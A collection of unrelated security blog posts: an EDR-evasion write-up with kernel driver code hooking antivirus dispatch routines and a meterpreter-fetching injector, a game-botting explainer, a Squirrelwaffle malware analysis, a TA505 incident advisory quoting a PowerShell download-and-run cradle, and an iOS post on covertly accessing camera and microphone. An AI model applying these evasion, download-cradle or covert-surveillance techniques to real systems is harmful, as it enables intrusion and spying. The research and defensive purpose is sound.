
In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {
				globals.Drivers[i].DriverUnload(DriverObject);
			}
			UnhookDriver(i);
		}
	}
	NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

New World’s Botting Problem

Source: https://pbs.twimg.com/profile_images/1392124727976546307/vBwCWL8W_400x400.jpg

New World, Amazon’s latest entry into the gaming world, is a massive multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

  • Actual cheaters trying to take shortcuts and get ahead
  • People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
  • Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like OwnedCore.com exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like g2g.com.

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like pyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like UnknownCheats.me.

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect if tools are monitoring the game’s screen or taking automated actions. It’s not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it’s really a neverending game of cat and mouse. That said, there are plenty of legitimate tools out there that do make this a much safer option, such as running their screen watchers on a totally different computer. Windows Remote Desktop, Team Viewer, or some sort of VNC are perfectly normal tools one would run to check in on their computer remotely. What’s not to say they couldn’t monitor the screen this way? Well, nothing. And that’s exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, running a bot with this method could still be detected, but it takes much more effort and is more prone to false positives, which may be against the interest of the game studio if they were to falsely ban legitimate players.

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won’t be posting a direct tutorial on how to build your own bot, I’d like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which incidentally, are noted to have been detected by the anti-cheat and gotten players banned already.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what’re the components we’ll need:

  • A way to capture a portion of the screen
  • A way to detect a specific pattern in the screen capture
  • A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
with mss.mss() as screen:
img = screen.grab(region)
mss.tools.to_png(img.rgb, img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our image. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
from numpy import array
to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_UNCHANGED)
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
    # Grab region
with mss.mss() as screen:
img = screen.grab(region)
mss.tools.to_png(img.rgb, img.size, output="sample.png")
    # Convert image to format usable by cv2
img_cv = cv2.cvtColor(array(img), cv2.COLOR_RGB2BGR)
    # Check if the tenable logo is present
result = cv2.matchTemplate(img_cv, to_detect, eval('cv2.TM_CCOEFF_NORMED'))
if((result >= 0.6).any()):
print('DETECTED')
break

Running the above and dragging a logo template into the region of the screen this is on will trigger the “DETECTED” message. To note, this code snippet may not work exactly as written depending on your monitor setup and configured resolution. There might be settings that need to be tweaked in some scenarios.

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.

What’s being done about it?

What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue as it isn’t unique to this game by any stretch of the imagination. The purpose of this article was to shed some light on how basic many of these botting services actually are to those that may be unaware.


New World’s Botting Problem was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

The Newest Malicious Actor: “Squirrelwaffle” Malicious Doc.

Authored By Kiran Raj

Due to their widespread use, Office Documents are commonly used by Malicious actors as a way to distribute their malware. McAfee Labs have observed a new threat “Squirrelwaffle” which is one such emerging malware that was observed using office documents in mid-September that infects systems with CobaltStrike.

In this Blog, we will have a quick look at the SquirrelWaffle malicious doc and understand the Initial infection vector.

Geolocation based stats of Squirrelwaffle malicious doc observed by McAfee from September 2021

 

Figure1- Geo based stats of SquirrelWaffle Malicious Doc
Figure1- Geo-based stats of SquirrelWaffle Malicious Doc

 

Infection Chain

  1. The initial attack vector is a phishing email with a malicious link hosting malicious docs
  2. On clicking the URL, a ZIP archived malicious doc is downloaded
  3. The malicious doc is weaponized with AutoOpen VBA function. Upon opening the malicious doc, it drops a VBS file containing obfuscated powershell
  4. The dropped VBS script is invoked via exe to download malicious DLLs
  5. Thedownloaded DLLs are executed via exe with an argument of export function “ldr
Figure-2: Infection Chain
Figure-2: Infection Chain

Malicious Doc Analysis

Here is how the face of the document looks when we open the document (figure 3). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

Figure-3: Image of Word Document Face
Figure-3: Image of Word Document Face

UserForms and VBA

The VBA Userform Label components present in the Word document (Figure-4) is used to store all the content required for the VBS file. In Figure-3, we can see the userform’s Labelbox “t2” has VBS code in its caption.

Sub routine “eFile()” retrieves the LabelBox captions and writes it to a C:\Programdata\Pin.vbs and executes it using cscript.exe

Cmd line: cmd /c cscript.exe C:\Programdata\Pin.vbs

Figure-4: Image of Userforms and VBA
Figure-4: Image of Userforms and VBA

VBS Script Analysis

The dropped VBS Script is obfuscated (Figure-5) and contains 5 URLs that host payloads. The script runs in a loop to download payloads using powershell and writes to C:\Programdata location in the format /www-[1-5].dll/. Once the payloads are downloaded, it is executed using rundll32.exe with export function name as parameter “ldr

Figure-5: Obfuscated VBS script
Figure-5: Obfuscated VBS script

De-obfuscated VBS script

VBS script after de-obfuscating (Figure-6)

Figure-6: De-obfuscated VBS script
Figure-6: De-obfuscated VBS script

MITRE ATT&CK

Different techniques & tactics are used by the malware and we mapped these with the MITRE ATT&CK platform.

  • Command and Scripting Interpreter (T-1059)

Malicious doc VBA drops and invokes VBS script.

CMD: cscript.exe C:\ProgramData\pin.vbs

 

  • Signed Binary Proxy Execution (T1218)

Rundll32.exe is used to execute the dropped payload

CMD: rundll32.exe C:\ProgramData\www1.dll,ldr

IOC

Type Value Scanner Detection Name
Main Word Document 195eba46828b9dfde47ffecdf61d9672db1a8bf13cd9ff03b71074db458b6cdf ENS,

WSS

 

W97M/Downloader.dsl

 

Downloaded DLL

 

85d0b72fe822fd6c22827b4da1917d2c1f2d9faa838e003e78e533384ea80939 ENS,

WSS

RDN/Squirrelwaffle
URLs to download DLL ·       priyacareers.com

·       bussiness-z.ml

·       cablingpoint.com

·       bonus.corporatebusinessmachines.co.in

·       perfectdemos.com

WebAdvisor Blocked

 

 

The post The Newest Malicious Actor: “Squirrelwaffle” Malicious Doc. appeared first on McAfee Blog.

TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

NCC Group’s global Cyber Incident Response Team have observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor. TA505 is a known cybercrime threat actor, who is known for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the mitigations section below

Execution

We observed that Base64 encoded PowerShell commands were executed shortly after the Serv-U exceptions indicating exploitation were logged. The PowerShell commands ultimately led to deployment of Cobalt Strike Beacons on the system running the vulnerable Serv-U software. The PowerShell command observed deploying Cobalt Strike can be seen below: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘hxxp://IP:PORT/a’))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled tasks named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly backup the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID\. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP-servers in your network and check these logs for traces of similar exceptions as suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds are describing follow-up activity regarding a completely different threat actor than we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of the vulnerability. The first indicator of compromise for the exploitation of this vulnerability are suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder. Looking at this log file it contains exceptions at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.

Check for RegIdleBackup task abuse

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content.

Check for altered RegIdleBackup task

Export-ScheduledTask -TaskName “RegIdleBackup” -TaskPath “\Microsoft\Windows\Registry\” | Select-String -NotMatch “<ClassId>{CA767AA8-9157-4604-B64B-40747123D5F2}</ClassId>”

Check for suspicious CLSID registry key content

Get-ChildItem -Path ‘HKLM:\SOFTWARE\Classes\CLSID\{SUSPICIOUS_CLSID}

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

  • Check if your Serv-U version is vulnerable
  • Locate the Serv-U’s DebugSocketlog.txt
  • Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
  • Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
  • Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
    • In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
  • If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021 after Microsoft published about the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Amount  Country 
1141  China 
549  United States 
99  Canada 
92  Russia 
88  Hong Kong 
81  Germany 
65  Austria 
61  France 
57  Italy 
50  Taiwan 
36  Sweden 
31  Spain 
30  Vietnam 
29  Netherlands 
28  South Korea 
27  United Kingdom 
26  India 
21  Ukraine 
18  Brazil 
17  Denmark 

Top vulnerable versions identified: 

Amount  Version 
441  SSH-2.0-Serv-U_15.1.6.25 
236  SSH-2.0-Serv-U_15.0.0.0 
222  SSH-2.0-Serv-U_15.0.1.20 
179  SSH-2.0-Serv-U_15.1.5.10 
175  SSH-2.0-Serv-U_14.0.1.0 
143  SSH-2.0-Serv-U_15.1.3.3 
138  SSH-2.0-Serv-U_15.1.7.162 
102  SSH-2.0-Serv-U_15.1.1.108 
88  SSH-2.0-Serv-U_15.1.0.480 
85  SSH-2.0-Serv-U_15.1.2.189 

MITRE ATT&CK mapping

Tactic  Technique  Procedure 
Initial Access  T1190 – Exploit Public Facing Application(s)  TA505 exploited CVE-2021-35211 to gain remote code execution. 
Execution  T1059.001 – Command and Scripting Interpreter: PowerShell  TA505 used Base64 encoded PowerShell commands to download and run Cobalt Strike Beacons on target systems. 
Persistence  T1053.005 – Scheduled Task/Job: Scheduled Task  TA505 hijacked a scheduled task named RegIdleBackup and abused the COM handler associated with it to execute malicious code and gain persistence. 
Defense Evasion  T1112 – Modify Registry  TA505 altered the registry so that the RegIdleBackup scheduled task executed the FlawedGrace RAT loader, which was stored as Base64 encoded strings in the registry. 

References 

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211 

[2] https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211 

[3] https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ 

How iOS Malware Can Spy on Users Silently

How iOS Malware Can Spy on Users Silently

Welcome to the first post of our latest blog series:

Mobile Attackers Mindset

In this blog series, we’re going to cover how mobile threat-actors think, and what techniques attackers use to overcome security protections and indications that our phones and tablets are compromised. 

In this first blog, we’ll demonstrate how the recently added camera & microphone green/orange indicators do not pose a real security challenge to mobile threat actors.


Starting iOS 14, there are a couple of new indicators: a green dot, and an orange dot. These indicators signal when the camera or the microphone are accessed.

We are less worried about the phone listening to us, when there’s no green/orange dot.

Source: https://support.apple.com/en-in/HT211876

We know that malware like NSO/Pegasus is capable of listening to the microphone. Can NSO Group and hundreds of other threat actors that target mobile devices can take videos of us while the visual indicator is off? 

Let’s examine if this feature poses any challenge to attackers.

Logical issues

Let’s first think about it. Is the indicator really on everytime the camera or microphone are accessed? We quickly think about Siri. How does the phone know when we say “Hey Siri” if the microphone indicator is not on all the time? The phone must be listening somehow right.

“Hey Siri” 

/System/Library/PrivateFrameworks/CoreSpeech.framework/corespeechd relies on VoiceTrigger.framework to continuously monitor the user’s voice, and then activate Siri when a keyword is heard.

Accessibility -> VoiceControl

Voice control allows you to interact with the device using voice commands.

/System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/XPCServices/com.apple.SpeechRecognitionCore.brokerd.xpc/XPCServices/com.apple.SpeechRecognitionCore.speechrecognitiond.xpc/com.apple.SpeechRecognitionCore.speechrecognitiond

is responsible for accessing the microphone.

Accessibility -> Switch Control

Part of the SwitchControl function is to detect the movement of the user’s head to interact with the device. Very cool feature! It’s handled by:

/System/Library/PrivateFrameworks/AccessibilityUI.framework/XPCServices/com.apple.accessibility.AccessibilityUIServer.xpc/com.apple.accessibility.AccessibilityUIServer

and

/System/Library/CoreServices/AssistiveTouch.app/assistivetouchd

These features must access the microphone or camera to function. However, these features do not trigger the green/orange visual indicators. This means that mobile malware can do the same.

This means that by injecting a malicious thread into com.apple.accessibility.AccessibilityUIServer / com.apple.SpeechRecognitionCore.speechrecognitiond daemons attackers can enable silent access to the microphone. Camera access requires additional patch which we will talk about it later

Bypass TCC Prompt

TCC stands for “Transparency, Consent, and Control”. iOS users often experience this prompt:

The core of TCC is a system daemon called tccd, and it manages access to sensitive databases and the permission to collect sensitive data from input devices, including but not limited to microphone and camera.

Did you know? TCC prompt only applies to applications with UI interface. Anything running in the background requires special entitlement to operate. The entitlement looks like the picture below. Just kTCCServiceMicrophone is enough for microphone access.

Camera access is a little more complicated. In addition to tccd, there is another system daemon called mediaserverd ensures that no process with background running state can access the camera. 

So far, it looks like an extra step (e.g. patching mediaserverd) is needed to access the camera in the background while the user is interacting with another foreground application.

Disable Visual Indicators For Microphone, Camera Access

First method is rough, using Cycript to inject code into SpringBoard, causing the indicator to disappear abruptly.

Inspired by com.apple.SpeechRecognitionCore.speechrecognitiond and  com.apple.accessibility.AccessibilityUIServer, a private entitlement (com.apple.private.mediaexperience.suppressrecordingstatetosystemstatus) that fits perfectly for our purpose! Unfortunately, this method does not work for camera access.

Accessing Camera in the Background by Patching ‘mediaserverd’

mediaserverd is a daemon that monitors media capture sessions. Processes that want to access the camera must be approved by tccd as well as mediaserverd. It is an extra layer of security after tccd. It also terminates the camera access when it detects an application is no longer running in the foreground.

Noteworthy, mediaserverd is equipped with a special entitlement (get-task-allow) to prevent code injection. 

As a result of “get-task-allow” entitlement, dynamic debugger relies on obtaining task ports like cycript, frida do not work on the mediaserverd daemon. mediaserverd also gets killed by the system frequently when it’s not responding, even for a short time. It’s not common: these signs are telling us that mediaserverd is in-charge of something important.

When a process switches to the background, mediaserverd will get notified and revoke camera access for that particular process. We need to find a way to make mediaserverd do nothing when it detects that the process is running in the background.

Following a brief research we found that it is possible to prevent mediaserverd from revoking camera access by hooking into an Objective-C method -[FigCaptureClientSessionMonitor _updateClientStateCondition:newValue:], so no code overwriting is required. 

To inject into mediaserverd, we used lldb. Lldb does not rely on task-port, instead it calls the kernel for code-injection. In reality, threat-actors that already have kernel code execution capabilities can replace the “entitlements” of mediaserverd to perform such injection.

POC source code is available here.

And on Mac…

From previous experiments back in 2015, the green light next to the front camera on a Mac, cannot be turned off using software only. Modifying the AppleCameraInterface driver and uploading a custom webcam firmware did not do the trick.The green light cannot be turned off since it lights when the camera is powered on. The light remains on as long as there’s power. Hardware-based indicators are ideal from a privacy perspective. We have not validated this on recent Mac versions / HW.

Demo

We made a demonstration, accessing the camera/microphone from the background process, and streaming video/audio using the RTMP protocol, steps:

  1. Set up RTMP server
  2. Compile mediaserver_patch, inject the code into mediaserverd
  3. Compile ios_streaming_cam, re-sign the binary with following entitlements and run it in the background
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.private.security.container-required</key>
    <false/>
    <key>platform-application</key>
    <true/>
    <key>com.apple.private.tcc.allow</key>
    <array>
        <string>kTCCServiceMicrophone</string>
        <string>kTCCServiceCamera</string>
    </array>
    <key>com.apple.security.iokit-user-client-class</key>
    <array>
        <string>IOSurfaceRootUserClient</string>
        <string>AGXDeviceUserClient</string>
    </array>
    <key>com.apple.private.mediaexperience.suppressrecordingstatetosystemstatus</key>
    <true/>
    <key>com.apple.private.mediaexperience.startrecordinginthebackground.allow</key>
    <true/>
    <key>com.apple.private.avfoundation.capture.nonstandard-client.allow</key>
    <true/>
</dict>
</plist>

By: 08Tc3wBB

Chrome Exploitation: An old but good case-study

Since the announcement of the @hack event, one of the world’s largest infosec conferences which will start during Riyadh Season, Haboob’s R&D team submitted 3 talks. All of them got accepted.

